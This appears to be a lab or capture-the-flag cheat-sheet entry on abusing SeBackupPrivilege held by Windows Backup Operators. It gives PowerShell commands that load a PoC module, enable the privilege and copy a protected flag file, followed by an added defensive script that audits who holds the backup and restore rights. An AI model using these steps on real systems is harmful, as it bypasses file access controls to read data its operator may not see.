Backup Operators

About

Membership in this group grants the SeBackup and SeRestore privileges. SeBackupPrivilege allows us to traverse any folder and list its contents, which lets us copy a file out of a folder even when the folder's access control list (ACL) contains no access control entry (ACE) for us. The standard copy command does not do this, however; the data has to be copied programmatically, with the FILE_FLAG_BACKUP_SEMANTICS flag specified.

We can use this PoC [LINK] to exploit SeBackupPrivilege and copy forbidden files.

Importing Required Libraries

PS C:\> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\> Import-Module .\SeBackupPrivilegeCmdLets.dll

Enabling SeBackupPrivilege

PS C:\> Set-SeBackupPrivilege
PS C:\> whoami /priv # verify: SeBackupPrivilege should now show as Enabled
PS C:\> Get-SeBackupPrivilege # verify using the imported module's own check

Copying a Protected File

PS C:\> Copy-FileSeBackupPrivilege 'C:\Users\venator17\flag.txt' .\flag.txt
PS C:\> cat .\flag.txt
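
The About section ties SeBackupPrivilege and SeRestorePrivilege to group membership, so the matching defensive check is to list who actually holds those rights on a host. The script below is an added example, not part of the original page or the PoC. It assumes an elevated Windows PowerShell 5.1+ session on a host that is not a domain controller; the temporary file name is arbitrary.

```powershell
# Added audit example (not from the original page or the PoC project).
# Run elevated: secedit needs administrative rights to export the policy.

$rights = 'SeBackupPrivilege', 'SeRestorePrivilege'
$cfg    = Join-Path $env:TEMP ("user-rights-{0}.inf" -f [guid]::NewGuid())

try {
    # Export only the user-rights section of the local security policy.
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null

    $holders = foreach ($line in Get-Content -Path $cfg) {
        # Lines look like: SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
        if ($line -match '^\s*(\w+)\s*=\s*(.*)$' -and $rights -contains $Matches[1]) {
            $right = $Matches[1]
            foreach ($entry in $Matches[2].Split(',')) {
                $id = $entry.Trim()
                if (-not $id) { continue }
                if ($id.StartsWith('*')) {
                    # SID entries carry a '*' prefix; resolve to a name when possible.
                    $sid = $id.TrimStart('*')
                    try {
                        $name = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                            [System.Security.Principal.NTAccount]).Value
                    } catch { $name = '<unresolved>' }
                } else {
                    # Some entries are written as plain account names.
                    $sid = ''; $name = $id
                }
                [pscustomobject]@{ Right = $right; Principal = $name; Sid = $sid }
            }
        }
    }
    $holders | Sort-Object Right, Principal | Format-Table -AutoSize

    # Members of the built-in Backup Operators group (well-known SID S-1-5-32-551).
    # Looking the group up by SID avoids problems with localized group names.
    Get-LocalGroupMember -SID 'S-1-5-32-551' |
        Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize
}
finally {
    Remove-Item -Path $cfg -ErrorAction SilentlyContinue
}
```

Any principal in the first table that is not an expected backup service account or administrative group, and any unexpected member in the second, is worth reviewing, since either route yields the privileges described above.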
